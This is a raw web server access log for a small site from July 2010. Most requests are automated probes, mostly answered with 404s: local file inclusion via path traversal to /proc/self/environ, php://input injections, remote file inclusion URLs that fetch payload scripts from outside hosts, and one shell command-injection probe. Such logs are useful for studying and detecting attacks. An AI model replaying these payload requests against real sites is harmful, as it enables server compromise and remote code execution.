212.158.160.121 - - [24/Jul/2010:08:21:52 -0700] "GET /index.php?option=com_weberpcustomer&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "getyourselfahorse.com"
212.158.160.121 - - [24/Jul/2010:08:21:55 -0700] "GET /logs/index.php?option=com_weberpcustomer&controller=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "getyourselfahorse.com"
212.158.160.121 - - [24/Jul/2010:08:21:55 -0700] "GET /index.php?option=com_weberpcustomer&controller=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:22:12 -0700] "GET /index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:27 -0700] "GET /logs/access_100626.log/index.php?option=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:27 -0700] "GET /index.php?option=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:27 -0700] "GET /logs/index.php?option=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:32 -0700] "POST /logs/access_100626.log/index.php?option=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:33 -0700] "POST /index.php?option=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:33 -0700] "POST /logs/index.php?option=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:45 -0700] "GET /logs/access_100626.log/index.php?option=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:46 -0700] "GET /index.php?option=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:46 -0700] "GET /logs/index.php?option=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:22:49 -0700] "GET /logs/access_100508.log/index.php?option=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:23:05 -0700] "POST /logs/access_100508.log/index.php?option=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
93.186.176.42 - - [24/Jul/2010:08:23:12 -0700] "GET /logs/access_100508.log/index.php?option=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:23:12 -0700] "GET /logs/access_100626.log/index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:23:12 -0700] "GET /index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:23:13 -0700] "GET /logs/index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:23:49 -0700] "GET /logs/access_100424.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:08:23:50 -0700] "GET /logs/access_100424.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:23:50 -0700] "GET /logs/access_100508.log/index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:08:28:01 -0700] "GET /logs/access_100522.log//modules/vwar/admin/admin.php?vwar_root=http://skizzdead.interfree.it/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:08:28:09 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:30:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:30:50 -0700] "GET / HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:30:50 -0700] "GET /logs/access_100626.log/index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:30:51 -0700] "GET /index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:30:51 -0700] "GET /logs/index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
208.80.193.42 - - [24/Jul/2010:08:31:03 -0700] "GET / HTTP/1.0" 200 899 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Comcast Install 1.0)" "getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:31:27 -0700] "GET /?D=A HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:31:37 -0700] "GET /logs/ HTTP/1.1" 200 3941 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:31:39 -0700] "GET /?N=D HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:31:40 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:31:44 -0700] "GET /?M=A HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
80.91.176.143 - - [24/Jul/2010:08:31:45 -0700] "GET /logs/access_100508.log/index.php?option=com_jinventory&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:31:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
72.44.59.35 - - [24/Jul/2010:08:31:59 -0700] "GET /?N=A HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:08:32:10 -0700] "GET /logs/access_100710.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:08:32:10 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.207.204.37 - - [24/Jul/2010:08:32:10 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
207.46.195.235 - - [24/Jul/2010:08:32:37 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
211.202.2.34 - - [24/Jul/2010:08:33:16 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.202.2.34 - - [24/Jul/2010:08:33:16 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.202.2.34 - - [24/Jul/2010:08:35:21 -0700] "GET /logs/access_100410.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.202.2.34 - - [24/Jul/2010:08:35:21 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.202.2.34 - - [24/Jul/2010:08:35:22 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.202.2.34 - - [24/Jul/2010:08:39:37 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
211.202.2.34 - - [24/Jul/2010:08:39:38 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:43:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:43:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:48:27 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:48:41 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:48:49 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:48:58 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:49:02 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:49:58 -0700] "GET /logs/access_100612.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:50:00 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:50:01 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:50:02 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:50:28 -0700] "GET /logs/access_100522.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:50:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:50:29 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:50:44 -0700] "GET /logs/access_100522.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:50:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:50:45 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:51:37 -0700] "GET /logs/access_100612.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:52:08 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:52:08 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:52:08 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
67.215.230.121 - - [24/Jul/2010:08:53:10 -0700] "GET /logs/access_100612.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:08:53:19 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:08:53:19 -0700] "GET /logs/access_100501.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:08:53:19 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:08:53:44 -0700] "GET /logs/access_100515.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:54:05 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:08:54:06 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:58:15 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:58:15 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:58:15 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:08:59:43 -0700] "GET /logs/access_100612.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
204.45.150.12 - - [24/Jul/2010:09:00:38 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
204.45.150.12 - - [24/Jul/2010:09:00:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
204.45.150.12 - - [24/Jul/2010:09:00:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
187.45.193.143 - - [24/Jul/2010:09:01:05 -0700] "GET /logs/access_100703.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:09:03:30 -0700] "GET /logs/access_100306.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:09:04:02 -0700] "GET /logs/access_100501.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:09:04:02 -0700] "GET /logs/access_100515.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.229.45.28 - - [24/Jul/2010:09:05:02 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "getyourselfahorse.com"
87.229.45.28 - - [24/Jul/2010:09:05:02 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "getyourselfahorse.com"
87.229.45.28 - - [24/Jul/2010:09:05:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:09:07:20 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:12:08 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:12:08 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:12:08 -0700] "GET /logs/access_100501.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:12:29 -0700] "GET /logs/access_100515.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:09:15:58 -0700] "GET /logs/access_100529.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:09:15:58 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:09:15:58 -0700] "GET /logs/access_100529.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:09:15:59 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:09:15:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
83.93.131.189 - - [24/Jul/2010:09:15:59 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
178.154.163.29 - - [24/Jul/2010:09:18:38 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 131072 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.getyourselfahorse.com"
